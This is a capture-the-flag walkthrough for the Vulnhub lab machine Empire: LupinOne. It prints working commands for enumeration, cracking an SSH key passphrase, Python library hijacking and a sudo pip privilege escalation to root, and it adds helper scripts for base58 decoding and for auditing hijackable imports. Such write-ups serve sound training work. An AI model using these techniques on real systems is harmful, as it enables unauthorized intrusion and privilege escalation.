# Empire: LupinOne Vulnhub WriteUp

<figure><img src="https://1680260334-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fuyv6WKxbnPSm2zlRacJi%2Fuploads%2FSc8d41hJHGrVeYoeTwsd%2Fimage.png?alt=media&#x26;token=628ec84e-b9ea-45a9-a51d-681839048ca1" alt=""><figcaption><p>Every lab, every wallpaper</p></figcaption></figure>

Empire: LupinOne is an easy-medium Vulnhub machine created by icex64 and Empire Cybersecurity. It is a good lab for CTF players who want to put their enumeration and Linux privilege-escalation skills to the test.

### Download

* **01-Empire-Lupin-One.zip** (Size: 922 MB)
* **Download (Mirror)**: <https://download.vulnhub.com/empire/01-Empire-Lupin-One.zip>

### Pentesting Methodology

**Network Scanning**

* netdiscover
* nmap

**Enumeration**

* abusing HTTP
* fuzzing

**Exploitation**

* john
* ssh

**Privilege Escalation**

* linpeas
* python library hijacking
* pip
* root flag

**Level: Easy-Medium**

### Network Scanning

First, we use netdiscover to find the victim machine's IP address on the local network (it turned out to be 192.168.1.2).

Next, we run an Nmap scan with default scripts and version detection against it:

```bash
nmap -sC -sV 192.168.1.2   # -sC: default NSE scripts, -sV: service/version detection
```

According to the nmap output:

* port 22: an SSH server.
* port 80: an HTTP service (Apache); the script output also discloses a **/\~myfiles** path.

<figure><img src="https://blogger.googleusercontent.com/img/a/AVvXsEghBsP84_4xLRFQPdgiP6oO24gZ_1IR7PMzfcsRrITiADV56Gfup6xmiXSe-se5HEuoQ4nf5I5RpFQalh4YyAAZ0E7oYKTZMBi0rhwYCNDxJV4WOWI4NW1zCMvwxfHc9Jb_1T6QAjVJm8eqByS2DcK-aqAf0-HKuRpTgga8UvSUCGkAraCU7rpunLdZTQ=s16000" alt=""><figcaption></figcaption></figure>

### Enumeration

We started enumeration by requesting the **/\~myfiles** path over HTTP. It returned a 404 error, which looked suspicious.

```shell
http://192.168.1.2/~myfiles/
```

<figure><img src="https://blogger.googleusercontent.com/img/a/AVvXsEhLH5sXCFOBNeJHgBJ1IDqH2OkfEhgvDFHcMSzswAgFMGG0K3Id-lUuF6wW0dJ77D7-GmFh-IOu8fVGnXuggRGIXWPsj7HEBhofU-ECTJKeQuGTAMBMKAQNw_9BEnJqCMq8w8AlhUdLwksXMzH6A4jO9lXeKhMk4EhHDLCqJQWOKuZiNNl6R4sZSCpxqA=s16000" alt=""><figcaption></figcaption></figure>

Viewing the page source, we found the HTML comment “you can do it, keep trying”, which confirms there is more to find.

<figure><img src="https://blogger.googleusercontent.com/img/a/AVvXsEhm6WdtreqzMmhBFuD-dtE9w_Iy6dysF3CBgsoY3jThLS7WAVaMV5C1dXAXbZY8-15m_4tpM7Bpr9QaNQC6AMHoR6RvjqdrGFAGBI4XN1AbVVo98pTwkQYt6WRGl0HmkVcrbPPo2bBtNaKams6iixIAesyheb37eOUfn1T6VMalL516NSKp2jhioHTBNQ=s16000" alt=""><figcaption></figcaption></figure>

So we fuzz for more information. The `~` prefix is the Apache userdir convention (`/~name` maps to a user's web directory), so with **ffuf** we fuzz `/~FUZZ` rather than plain directories and find one named **secret**.

{% code overflow="wrap" lineNumbers="true" %}

```bash
ffuf -c -w /usr/share/seclists/Discovery/Web-Content/common.txt -u 'http://192.168.1.2/~FUZZ'
```

{% endcode %}

<figure><img src="https://blogger.googleusercontent.com/img/a/AVvXsEjZ6f7qCjVe9e0Iu-wk4oyPAf7M1z5mLsRpHoYLeMr5bvcZQ9RsqbNIM1KtqBtpdbIr3xVN3yezqeqSs6MtEgWBI7YI_R9CqFXxsYCXpoCZPXNv7Z9Yk9RnEB1l9-FGUJ3egsymxYxDLBq96Xg82Vorm0EKbmi-8bgw6CyCemDrD0oSH5kBwdPMhbSpMQ=s16000" alt=""><figcaption></figcaption></figure>

Looking through the **secret** directory, the author hints that an SSH private key file for the user “icex64” is hidden in there and that we need to fuzz for it.

<figure><img src="https://blogger.googleusercontent.com/img/a/AVvXsEhwupkQdJHLd8xUCJJoRFZmijoRNwKZ9yKGILmhp3SMxS3uLODDooGt1E-LbenubOt0xpQxJiLS6bDbzadlyn2KE_kNqsjIJGMmDPD0R5U96ff2PaVNfmErzqgnewblm2eG6SeHxLqaRZ93KuadSoiOzHtcQklK23TyDwZRccjCWZqX6uGtZEMSGbblSQ=s16000" alt=""><figcaption></figcaption></figure>

To find the hidden key file we fuzz again with ffuf, this time for dot-prefixed (hidden) files with .txt and .html extensions, filtering out 403 responses, and find the hidden file **.mysecret.txt**.

{% code overflow="wrap" lineNumbers="true" %}

```shell
ffuf -c -ic -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u 'http://192.168.1.2/~secret/.FUZZ' -fc 403 -e .txt,.html
```

{% endcode %}

<figure><img src="https://blogger.googleusercontent.com/img/a/AVvXsEi5QbA5G3b6uOm9Ju_dfUZqgHd4c-U_-anbrMPMZ1bUbfSgiRLNaiGOuPovaYoCP9DONRdykY0QcCsNMLrh9aFlOHO6c9L0EcIdvyCyfUTkxKOePVw9330JbwtRxjMrpzqzpBOvOc9oLPVa9DaeiUTFisf7tu01IDM04OpwUezDEOYEhazqttnoSGke3w=s16000" alt=""><figcaption></figcaption></figure>

We open .mysecret.txt in a web browser. It looks like a **private SSH key**, but encoded. Looking at the character set, the blob contains no 0, O, I or l and no +, / or = padding, which is the signature of **base58** rather than base64.

```shell
http://192.168.1.2/~secret/.mysecret.txt
```

<figure><img src="https://blogger.googleusercontent.com/img/a/AVvXsEg84s0NAW0DGep_GZ2JJJvPapD-bmiPfHN8kTqqXh_wAmQGvRDQeII8qZoPqxx8mhWAuzXCVUo1jofUynz5ycgCtNxTpXZM20ym3kQHfzGSif0GGQRoVcYdkpyRzMwJeT57U_JOi5JsAV6DVpmQPTILVtexiNoemQnGkaDTZo4Yy7fUI0LozCXc-iM5zg=s16000" alt=""><figcaption></figcaption></figure>

We looked up a base58 decoder online and used [browserling](https://www.browserling.com/tools/base58-decode), a simple web-based base58 decoder.

Paste the blob into the form, click the Base-58 Decode button, and the decoded output is our **ssh key**. (For a lab this is fine; on a real engagement decode key material locally rather than pasting it into a third-party site.)

<figure><img src="https://blogger.googleusercontent.com/img/a/AVvXsEirLSLPT-MiFXVXnIT8_s8Gu2UFPds70YN2EK9G_VubFyxEjZlBAZ88eMW42NEJOjgv2Qli4P0ZX646gpwAq-VdHCEJ4JoIIFOqG3zLSVlGBLqpUDZOAVJMut_jOrZeVkty6qMC1y-GHXMWefCT92Ac_GhpQXz7nhhBdTj2Ahk2aPytPxzz-VtrD_vPNw=s16000" alt=""><figcaption></figcaption></figure>
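The same decode done offline, as an added example rather than code from the original write-up: a from-scratch base58 codec (Bitcoin alphabet) plus the character-set check that tells base58 apart from base64 before you decode, and a sanity check that the result really is PEM-style key material. The sample inputs in the test are constructed, not the key from the box; `decode_key_blob` and the file name `b58key.py` are names chosen here.

```python
"""Offline base58 decode/encode (added example, not from the original page).

Base58 is base64 minus the easily confused characters 0, O, I, l and the
symbols +, / and =; that absence is how to recognise it.  Leading '1'
characters encode leading zero bytes, which a naive big-integer conversion
would drop.
"""
import sys

ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
_INDEX = {ch: i for i, ch in enumerate(ALPHABET)}


def looks_like_base58(text: str) -> bool:
    """Triage: True if every non-whitespace character is in the base58 alphabet.

    A blob containing 0, O, I, l, '+', '/' or '=' is base64 (or something
    else), so this check should be run before picking a decoder."""
    stripped = "".join(text.split())
    return bool(stripped) and all(ch in _INDEX for ch in stripped)


def b58decode(text: str) -> bytes:
    """Decode base58 text to bytes; raises ValueError on invalid characters."""
    stripped = "".join(text.split())
    bad = {ch for ch in stripped if ch not in _INDEX}
    if bad:
        raise ValueError(f"not base58, invalid characters: {sorted(bad)}")
    num = 0
    for ch in stripped:
        num = num * 58 + _INDEX[ch]
    body = num.to_bytes((num.bit_length() + 7) // 8, "big") if num else b""
    leading_zeros = len(stripped) - len(stripped.lstrip("1"))
    return b"\x00" * leading_zeros + body


def b58encode(data: bytes) -> str:
    """Encode bytes to base58 (inverse of b58decode)."""
    num = int.from_bytes(data, "big")
    out = []
    while num:
        num, rem = divmod(num, 58)
        out.append(ALPHABET[rem])
    leading_zeros = len(data) - len(data.lstrip(b"\x00"))
    return "1" * leading_zeros + "".join(reversed(out))


def decode_key_blob(text: str) -> bytes:
    """Decode a blob and check that it is PEM-style private key material."""
    if not looks_like_base58(text):
        raise ValueError("input is not base58; check for base64 characters")
    key = b58decode(text)
    if not key.startswith(b"-----BEGIN"):
        raise ValueError("decoded data is not a PEM-style key; try another encoding")
    return key


if __name__ == "__main__":
    # Usage: python3 b58key.py .mysecret.txt > sshkey   (file name assumed)
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8") as fh:
            sys.stdout.buffer.write(decode_key_blob(fh.read()))
    else:
        # Constructed demo: round-trip a fake PEM header through the codec.
        sample = b"-----BEGIN OPENSSH PRIVATE KEY-----\nAAAA\n-----END OPENSSH PRIVATE KEY-----\n"
        print(b58encode(sample))
        print(decode_key_blob(b58encode(sample)).decode())
```

Run it on the downloaded blob to write the key file directly; the `-----BEGIN` check catches the case where the blob was actually base64 or double-encoded, which otherwise shows up later as an unhelpful ssh2john or ssh error.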

### Exploitation

The author also hinted that the SSH key is protected by a passphrase, so we use ssh2john to turn the key into a hash that john can crack.

{% code lineNumbers="true" %}

```shell
locate ssh2john                               # find the converter shipped with john
/usr/share/john/ssh2john.py sshkey > hash     # extract the passphrase hash from the key file
```

{% endcode %}

Now crack the hash with john using the fasttrack wordlist that ships with Kali:

```shell
john --wordlist=/usr/share/wordlists/fasttrack.txt hash
```

Within seconds, bingo! The key's passphrase is **P\@55w0rd!**.

<figure><img src="https://blogger.googleusercontent.com/img/a/AVvXsEijOCVSJJBUX0zThR9vVWf-CHaLS2IDwCbNxV1_TGmJZxtZ9o-iUO5jm335xNU_L4-IO6SLgp3B6-8x7NJ3SGm8ZQZvJIevj3mKJfUi7MxViUegItw48yvk-hGgmvJEfc-zAvwBglI1WhPyW9nQRPiWTyjl9yxO9F0T9b5SNuLyieUV_gDZPAxm1deJQA=s16000" alt=""><figcaption></figcaption></figure>

We now have everything needed for an SSH login: the username **icex64**, the private key, and its passphrase (**P\@55w0rd!**). ssh refuses to use a key file that other users can read, so restrict its permissions first.

```shell
chmod 600 sshkey                   # ssh ignores private keys with permissive modes
ssh -i sshkey icex64@192.168.1.2   # enter P@55w0rd! at the passphrase prompt
```

Bang!! We are in as **icex64**. We immediately check what this user may run with sudo and find a Python script, /home/arsene/heist.py, runnable as the user **arsene**. Reading the script shows that it imports the **webbrowser** module, which makes it a candidate for the **Python Library Hijacking** technique.

{% code lineNumbers="true" %}

```shell
sudo -l                      # list the commands icex64 may run via sudo
cat /home/arsene/heist.py    # inspect the script and the modules it imports
```

{% endcode %}

<figure><img src="https://blogger.googleusercontent.com/img/a/AVvXsEhBSCBNa0u9PentMJ8Pbp5k7XFzZRgb8GaiT0aurTrnrYY5udON_5DM6jhif3PVblPaNOXLmSnY4YEvhbuVQHloZx2jiWjeq8ml5C9p_it9hR9A2XxXUT-owiZ48T7pgvG59c7twyyW0TO29wwQ5bljWj_IGK8OV4rjouvcI_aUkkKHUgEtxG8Ax0kl-A=s16000" alt=""><figcaption></figcaption></figure>

### Privilege Escalation

Now we escalate privileges. For Python Library Hijacking we first need the location of the **webbrowser.py** module that heist.py imports, and to know whether we can write to it; that is why we run the **linpeas** script.

We had already downloaded linpeas from its GitHub [page](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS). On Kali we change into that directory and start a simple Python HTTP server to serve it:

```shell
python -m SimpleHTTPServer 80    # Python 2; with Python 3 use: python3 -m http.server 80
```

<figure><img src="https://blogger.googleusercontent.com/img/a/AVvXsEh4BQ2VQiDgk_lKM7b3S5thy9Z01nEia3j2cJIBpV58zUyvnJEbzhs9CZSgTAnsDz3V8sZZdtKWQBkehmzqh3W2xSVVXV_eyxTCjmWcOTw-WZx1AxUXJ30one7QR_kC4LUG4NEJuPMSH4KB17Q1g5i9f8ot8nidaxFqpubrdhnTpwxeGeY6rgpCVivqNQ=s16000" alt=""><figcaption></figcaption></figure>

Back in the icex64 shell, we move to /tmp and fetch linpeas from the Kali box (192.168.1.3) with wget.

{% code lineNumbers="true" %}

```shell
cd /tmp
wget 192.168.1.3/linpeas.sh
```

{% endcode %}

Then we make the script executable (chmod +x would do; 777 is more than needed) and run it straight away.

{% code lineNumbers="true" %}

```shell
chmod 777 linpeas.sh
./linpeas.sh
```

{% endcode %}

<figure><img src="https://blogger.googleusercontent.com/img/a/AVvXsEiZQlBdUI6gxnU7VILl5Phw-avfYYgRqCZO0pYa1wDHpL_2Lk2CaAc49wRhXgonvbqDYIL-y3CZNqWmAKxHocWyYBmxYrFQpaGIuPJyXFDz1gio-5Mqi4Nxu64aey_0eq32iRcpdoNHwx1nyWxzPnfA1UNwe_JcOibNsZaw62t-NcISiAieqPUVWtvjdg=s16000" alt=""><figcaption></figcaption></figure>

Within seconds linpeas reports the location of **webbrowser.py** and, crucially, that the file is writable by our user.

<figure><img src="https://blogger.googleusercontent.com/img/a/AVvXsEjXziEp5PBGXxWN_J-9E0TiFtYpBemHQsTCLgM86YOHKSGDLuarVj54lHDJrPHE7QymmDlTDDs7-1mYO1leBzd8Zm2cYioY6raHKDIBpxb3b632VvGcvXXbHaEvt_xhsOgzRtSQxpUmzhmQGqnK8fx1IwX4sYQQTE4x8w5D_cyhex7EDkCC33CiYXDfwA=s16000" alt=""><figcaption></figcaption></figure>

Now the Python Library Hijacking can begin. Python resolves `import webbrowser` by walking the directories on sys.path in order and executing the first matching module it finds. If we can write to that module (or place a same-named file in a directory searched earlier), our code runs with the privileges of whichever script imports it; here that is heist.py running as arsene via sudo. You can learn more about the technique [here](https://www.hackingarticles.in/linux-privilege-escalation-python-library-hijacking/).

We edit webbrowser.py with nano and append a line that spawns a shell. webbrowser.py already imports os at the top, so no extra import is needed:

```python
os.system("/bin/bash")
```

<figure><img src="https://blogger.googleusercontent.com/img/a/AVvXsEhWkjkHox5l5yd_Zqt2Sl3_TSbEVxr79z8AFGanQ8TOEuL47SZw6u1ZBIRBsfdkTgjFHcN7MKen2SAWX6h4BXvIZntIsh8ShuITk5zwmWN5MQg40Xqvi8PlW4mvqH7vHl5ily8_4GSzvFJkXgDA8BqzJE5D2O1uizwc_My8cripa58ZpLj42RHMyh3YHg=s16000" alt=""><figcaption></figcaption></figure>

With that in place we run exactly the command line that sudo -l listed for icex64, which switches us from **icex64** to **arsene** because heist.py imports our modified module.

```shell
sudo -u arsene /usr/bin/python3.9 /home/arsene/heist.py   # import webbrowser now spawns a shell as arsene
```
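The check linpeas did for us here, automated, as an added example that is not code from the original write-up or from the box: given a script that sudo lets us run as another user, it parses the script's imports and reports every module that is either writable by us (the webbrowser.py case on this box) or shadowable, meaning a writable directory is searched before the real module, so a same-named .py dropped there wins the import. The `heist.py`/`heist_helper` fixture it builds in a temporary directory is constructed for the demo.

```python
"""Audit which imports of a privileged Python script can be hijacked.

Added example, not from the original page.  Two attack shapes are checked:
(1) the resolved module file is writable, so a payload can be appended to it;
(2) a directory earlier on the search path is writable, so a same-named
module dropped there shadows the real one.  Python puts the script's own
directory first on sys.path, which is why that directory is checked first.
"""
import ast
import os
import sys
import tempfile
from importlib.machinery import PathFinder


def top_level_imports(script_path):
    """Top-level module names from `import x` / `from x import y` statements."""
    with open(script_path, encoding="utf-8") as fh:
        tree = ast.parse(fh.read(), filename=script_path)
    names = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            names.update(alias.name.split(".")[0] for alias in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module and node.level == 0:
            names.add(node.module.split(".")[0])
    return sorted(names)


def hijackable_imports(script_path, search_path=None):
    """Return one finding dict per import that is writable or shadowable."""
    script_dir = os.path.dirname(os.path.abspath(script_path))
    base = search_path if search_path is not None else sys.path
    path = [script_dir] + [p for p in base if p and os.path.abspath(p) != script_dir]
    findings = []
    for name in top_level_imports(script_path):
        spec = PathFinder.find_spec(name, path)
        if spec is None or not spec.origin or not os.path.isfile(spec.origin):
            continue  # builtin, frozen, namespace package or not on path: nothing to edit
        origin = spec.origin
        if spec.submodule_search_locations is not None:   # package: origin is pkg/__init__.py
            found_in = os.path.dirname(os.path.dirname(origin))
        else:
            found_in = os.path.dirname(origin)
        # (1) the real module file is writable by us: append a payload in place.
        if os.access(origin, os.W_OK):
            findings.append({"module": name, "path": origin,
                             "reason": "module file writable"})
        # (2) a writable directory is searched before the directory the module
        #     was found in: a same-named file dropped there wins the import.
        for entry in path:
            if os.path.abspath(entry) == os.path.abspath(found_in):
                break
            if os.path.isdir(entry) and os.access(entry, os.W_OK):
                findings.append({"module": name, "path": origin,
                                 "reason": f"shadowable from writable {entry}"})
                break
    return findings


def demo():
    """Constructed fixture: a 'heist.py' importing a stdlib module plus a helper
    module that sits next to it and is writable by us; returns the findings."""
    tmp = tempfile.mkdtemp(prefix="hijack-demo-")
    with open(os.path.join(tmp, "heist_helper.py"), "w", encoding="utf-8") as fh:
        fh.write("def run():\n    print('legit helper')\n")
    script = os.path.join(tmp, "heist.py")
    with open(script, "w", encoding="utf-8") as fh:
        fh.write("import webbrowser\nimport heist_helper\nheist_helper.run()\n")
    return hijackable_imports(script)


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else None
    for f in (hijackable_imports(target) if target else demo()):
        print(f"{f['module']:14} {f['reason']}  -> {f['path']}")
```

Run it as the low-privileged user against the script from the sudo entry (for example `python3 audit.py /home/arsene/heist.py`, file name assumed) using the same interpreter sudo would invoke, since sys.path differs between Python versions. The defence is the mirror image: modules imported by anything run via sudo must not be writable by unprivileged users, and the script's own directory must not be either.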

As **arsene** we check this user's sudo permissions and find that it may run the **pip** binary as root without authentication (NOPASSWD). After a moment's thought, that points straight to a **pip** privilege escalation.

```shell
sudo -l
```

<figure><img src="https://blogger.googleusercontent.com/img/a/AVvXsEgvklUoad4JLXkXs14AoNBGI3Aswm0o-ZDYHuYXJRHJT90AMeyBkLS58O07ycTkzjTciLZ9CHnv4sQbMNAOMKH7vzQ1BKE2UBhhLZgelYLwqkRspcKv8ZfTwwvTH7Hk1bqfKyqRgh0aJL2khTuc3VwV5lSJFk5tUZ5_PlOEK3DUuI9v8p7zby5sbID9Xg=s16000" alt=""><figcaption></figcaption></figure>

We used the GTFOBins instructions for pip provided [here](https://gtfobins.github.io/gtfobins/pip/). If sudo allows the program to run as the superuser, it keeps those elevated rights and can be used to access the file system, escalate, or maintain privileged access.

The escalation takes only three commands: create a throw-away directory, drop a setup.py into it whose top-level code execs a shell attached to our terminal, and have root "install" that directory. Note that `$(tty)` is expanded by our own shell while writing the file, so the path of our terminal is baked into setup.py.

{% code overflow="wrap" lineNumbers="true" %}

```shell
TF=$(mktemp -d)                                   # throw-away 'package' directory
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py   # executed when pip builds the package
sudo pip install $TF                              # pip runs setup.py as root
```

{% endcode %}

Yippee!! Finally we have root; the id command confirms it. Change directory to /root and we have the root flag.

<figure><img src="https://blogger.googleusercontent.com/img/a/AVvXsEhlfEyBcD3Gw2y6qRNfp0GXBB40IpRAYpbLcK9zEYNeEgFSdZ4wNf3sQemPL4UFMedkZyXYKY5Z3XaREzYCAAxXzT-8CinoiokZsvJLY4A2qd3uD53euSQmU8Z1QRehpRMtsC2YpALZ0FEixOFUWOcqYA1ZEZVZyzGGBJsywyo5f5CT3no53Qb9I7EUfA=s16000" alt=""><figcaption></figcaption></figure>

That is how we obtain the machine's root shell. It was a terrific exercise and a lot of fun; to understand the different scenarios it contains, try it yourself.

**Author**: Eopi Noriko is a passionate Cybersecurity Researcher, contact [Facebook](https://www.facebook.com/Thuong.EoPi/).

